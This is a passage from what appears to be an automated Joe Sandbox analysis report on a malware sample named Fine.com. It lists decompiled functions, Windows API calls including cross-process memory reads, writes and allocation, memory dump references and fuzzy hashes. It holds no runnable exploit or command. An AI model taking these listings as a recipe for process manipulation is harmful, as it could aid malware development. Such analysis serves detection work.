                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: GetLastError.KERNEL32(002A1DC4,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4,002A1DC4), ref: 00202D60
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202640
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202653
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202664
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202675
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7da05215737f9c7978230b97399557d8e6d21309281401c7f2078d31fe4fef61
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d220a0edab559b39c27d50a3df534323edd260d3bad81ce08b004130d6f4b48b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7da05215737f9c7978230b97399557d8e6d21309281401c7f2078d31fe4fef61
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EF0BD74421311DFC701AF68FE4D9483A64BB267613050907F414D66F6CB310D36BE94
                                                                                                                                                                                                                                                                                                                            Function 002012B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dcaffd3ea317affbcc052815618da869262f6a4a72f584bb3fbbadd0ed5fecbd
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2b9c30d978c747d38ef75b382a794afdc8ca63cc67759f6328d8fd5b33abf32c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcaffd3ea317affbcc052815618da869262f6a4a72f584bb3fbbadd0ed5fecbd
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90D1F271930307CADB258F68C8957BABBB5FF15300F28415AE5029B2E2D7769DB0CB91
                                                                                                                                                                                                                                                                                                                            Function 00255231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002441FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244229
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002441FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244239
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00255419
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0025550E
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002555CD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                                                                                                                                                            • String ID: bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 2854431205-3976982791
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 45840f8dbdcb608551bbfc7f28a4a62058ecdc3680bfc2ddd64ed9f1eca2b682
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 518c4e5700ec053f3032b3adff77d9b1f6b9658d2e7a9ed6139614a0f2423cdc
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45840f8dbdcb608551bbfc7f28a4a62058ecdc3680bfc2ddd64ed9f1eca2b682
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5D15C70A10249DFCB08DF95C4A0AEEBBB4FF58305F54405EE806AB291DB71E99ACF50
                                                                                                                                                                                                                                                                                                                            Function 001DCF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001DD253
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: t5*$t5*$t5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-59120502
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8e350e6b6dc36fac9bfb42d72644ba511b59ff21891d53b586440dab726ccdb4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ce4fc65370ece3f268707746e3322a9c51248d8a42676ed875863410a9507a20
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e350e6b6dc36fac9bfb42d72644ba511b59ff21891d53b586440dab726ccdb4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A915BB5A00206DFCB18CF58E4906AABBF1FF99310F25855AE9459B340D731EE82CF90
                                                                                                                                                                                                                                                                                                                            Function 002561A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 157775604-2243500937
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e85ef3911912a3db0cbbbde8a2be1965f0792cc8e5cad1cb1466da4ed9a82692
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7dc8ba8b935c2b1b4389631920d016ca8c7c43dea75dd4bb84a084743cd3707a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85ef3911912a3db0cbbbde8a2be1965f0792cc8e5cad1cb1466da4ed9a82692
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA41B071E102099FCB00DFA5C8899BEBBB5FF59325F50402AE806E7251D7719D96CB90
                                                                                                                                                                                                                                                                                                                            Function 00233063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00232B1D,?,?,00000034,00000800,?,00000034), ref: 0023BDF4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002330AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00232B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0023BDBF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0023BD1C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00232AE1,00000034,?,?,00001004,00000000,00000000), ref: 0023BD2C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00232AE1,00000034,?,?,00001004,00000000,00000000), ref: 0023BD42
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0023311A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00233167
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b0986c7e0c2de0314669bb3db22e3879625776876663d3d6b41152fb5d5c80f0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: be38f60008a57e2724c09ae89e010f73fb24552aae18dd1097ea64bed6677e9f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0986c7e0c2de0314669bb3db22e3879625776876663d3d6b41152fb5d5c80f0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C14119B2A0021CAEDB11DFA4CD85ADEBBB8EF49700F004095FA55B7180DB706F95DBA1
                                                                                                                                                                                                                                                                                                                            Function 00201A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\424372\Fine.com,00000104), ref: 00201AD9
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00201BA4
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00201BAE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                            • API String ID: 2506810119-950796607
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8f4e924184dfc5e515a6ce8e4e12bccd9aa04d00b21576394eabc30267c9772e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4ddf99dce7da8b9c36ed44a1c0061164927e20cef1d3f4b0b400e6470968bac0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f4e924184dfc5e515a6ce8e4e12bccd9aa04d00b21576394eabc30267c9772e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF316F71A10319EBCB21DF99DC85D9EBBFCEF85714B1041AAF80497292E7B04E64DB90
                                                                                                                                                                                                                                                                                                                            Function 0023CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0023CBB1
                                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0023CBF7
                                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002A29C0,00BA5E90), ref: 0023CC40
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ff33fe2ce4933f8a2131fd6be88c6c56128d266b812ba7a27a534065bb5a4a55
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9253319546418c9852d408e0379ef2d268bfe9f0f4a29605c8bed9ce4ea4e5a1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff33fe2ce4933f8a2131fd6be88c6c56128d266b812ba7a27a534065bb5a4a55
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F41C3B12143029FD720DF24D885B1ABBE8EF84714F244A1EF9A5A72D1D770E924CB66
                                                                                                                                                                                                                                                                                                                            Function 00264EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0026DCD0,00000000,?,?,?,?), ref: 00264F48
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00264F65
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00264F75
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dc825c0555f964d43b54b9d38e2f2a53feb55ccf09e4020915d0d2f292bbedd9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 660fd2883782b61ceea6a46eee270953292ded1b13a68777944588446fb7b917
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc825c0555f964d43b54b9d38e2f2a53feb55ccf09e4020915d0d2f292bbedd9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D631B03162020AAFDF219E38DC45BDA77A9EB19338F204715F9B5A21E0C770ECA09B50
                                                                                                                                                                                                                                                                                                                            Function 00253AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00253AD4,?,?), ref: 00253DD5
                                                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00253AD7
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00253AF8
                                                                                                                                                                                                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00253B63
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 32cc4efad7f52e0c6d0d6ff28ec9aff563e9d72905a52615893bdb471127b002
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 59bb2890c15e3ff6bdf8e0578389997fa8648fed512d0f5d1e3b18aab56831b7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32cc4efad7f52e0c6d0d6ff28ec9aff563e9d72905a52615893bdb471127b002
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B531D535610202DFCB10CF68C485E69B7F1EF143A9F249159EC168B392D771EE5ACB64
                                                                                                                                                                                                                                                                                                                            Function 00264954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002649DC
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002649F0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00264A14
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4b6cbe1f785b13a4be21fd891621c929de719d67e13b56795d87838d7e4a537d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cd631f9ee03c0e130e663b23979a3d26feb45d7602f867cd3dbfb031210c40f3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b6cbe1f785b13a4be21fd891621c929de719d67e13b56795d87838d7e4a537d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2321EF32660219BBDF119F90DC86FEB3B69EF48718F110214FA556B0D0D6B1ECA1DB90
                                                                                                                                                                                                                                                                                                                            Function 002650F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002651A3
